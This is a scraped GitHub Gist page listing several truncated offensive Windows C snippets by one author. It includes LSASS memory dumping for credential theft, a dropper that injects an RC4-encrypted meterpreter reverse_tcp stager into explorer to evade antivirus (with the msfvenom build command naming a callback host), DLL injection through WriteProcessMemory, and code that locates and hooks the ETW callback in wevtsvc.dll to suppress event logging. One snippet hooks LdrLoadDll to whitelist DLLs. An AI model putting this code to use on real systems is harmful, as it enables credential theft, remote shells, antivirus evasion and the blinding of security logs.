Skip to content

Instantly share code, notes, and snippets.

@bats3c
bats3c / dumplsass.c
Last active August 6, 2020 01:55
Dump the memory from lsass
#include <stdio.h>
#include <windows.h>
#include <dbghelp.h>
#include <tlhelp32.h>
DWORD findLsass()
{
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if(hSnapshot)
{
@bats3c
bats3c / winapi_dropper.c
Created August 6, 2020 01:58
Inject a meterpreter stager into explorer while bypassing anti virus
#include <stdio.h>
#include <windows.h>
#include <wincrypt.h>
#include <tlhelp32.h>
/****************************************************************************************************/
// msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.239 LPORT=4444 -f raw -o meter.bin
// cat meter.bin | openssl enc -rc4 -nosalt -k "HideMyShellzPlz?" > encmeter.bin
// xxd -i encmeter.bin
// x86_64-w64-mingw32-gcc dropper.c -o dropper.exe
#include <stdio.h>
#include <windows.h>
#define BUFFER_FILE ".\\wpm_buffer.bin"
// definitions
typedef WINBOOL (WINAPI * WriteProcessMemory_) (HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten);
char OrgWriteProcMem[50] = {};
VOID InjectDll(DWORD dwPid, LPCVOID lpDllPath)
{
LPVOID lpBuffer;
HANDLE hProcess, hThread;
hProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, dwPid);
if (!hProcess)
{
return;
}
@bats3c
bats3c / ldrloaddll_hook.c
Last active March 14, 2024 06:49
Hook LdrLoadDll to whitelist DLLs being loaded into a process
#include <stdio.h>
#include <windows.h>
#include <winternl.h>
#define dwAllowDllCount 1
CHAR cAllowDlls[dwAllowDllCount][MAX_PATH] = {
"W:\\allowed.dll"
};
VOID HookLoadDll(LPVOID lpAddr);
#include <stdio.h>
#include <windows.h>
#include <wincrypt.h>
#include <tlhelp32.h>
#include <ntdef.h>
#include <winternl.h>
#include "main.h"
/****************************************************************************************************/
@bats3c
bats3c / locate_wevtsvc_base_address.c
Last active September 4, 2020 14:32
Locate the base address of wevtsvc.dll
DWORD_PTR dwBase;
DWORD i, dwSizeNeeded;
HMODULE hModules[102400];
TCHAR szModule[MAX_PATH];
if (EnumProcessModules(GetCurrentProcess(), hModules, sizeof(hModules), &dwSizeNeeded))
{
for (int i = 0; i < (dwSizeNeeded / sizeof(HMODULE)); i++)
{
ZeroMemory((PVOID)szModule, MAX_PATH);
@bats3c
bats3c / pattern_search_etwcallback.c
Last active September 4, 2020 14:42
Pattern search for the ETW callback
#define PATTERN "\x48\x83\xec\x38\x4c\x8b\x0d"
DWORD i;
LPVOID lpCallbackOffset;
for (i = 0; i < 0xfffff; i++)
{
if (!memcmp((PVOID)(dwBase + i), (unsigned char*)PATTERN, strlen(PATTERN)))
{
lpCallbackOffset = (LPVOID)(dwBase + i);
@bats3c
bats3c / hook_etw_callback.c
Created September 4, 2020 15:12
Hook The ETW Callback
VOID HookEtwCallback()
{
DWORD oldProtect, oldOldProtect;
unsigned char boing[] = { 0x49, 0xbb, 0xde, 0xad, 0xc0, 0xde, 0xde, 0xad, 0xc0, 0xde, 0x41, 0xff, 0xe3 };
*(void **)(boing + 2) = &EtwCallbackHook;
VirtualProtect(lpCallbackOffset, 13, PAGE_EXECUTE_READWRITE, &oldProtect);
memcpy(lpCallbackOffset, boing, sizeof(boing));
@bats3c
bats3c / restore_callback.c
Created September 4, 2020 15:32
Restore the callback so we can report an event, then rehook it
typedef VOID(WINAPI * EtwEventCallback_) (EVENT_RECORD *EventRecord);
VOID DoOriginalEtwCallback( EVENT_RECORD *EventRecord )
{
DWORD dwOldProtect;
VirtualProtect(lpCallbackOffset, sizeof(OriginalBytes), PAGE_EXECUTE_READWRITE, &dwOldProtect);
memcpy(lpCallbackOffset, OriginalBytes, sizeof(OriginalBytes));
VirtualProtect(lpCallbackOffset, sizeof(OriginalBytes), dwOldProtect, &dwOldProtect);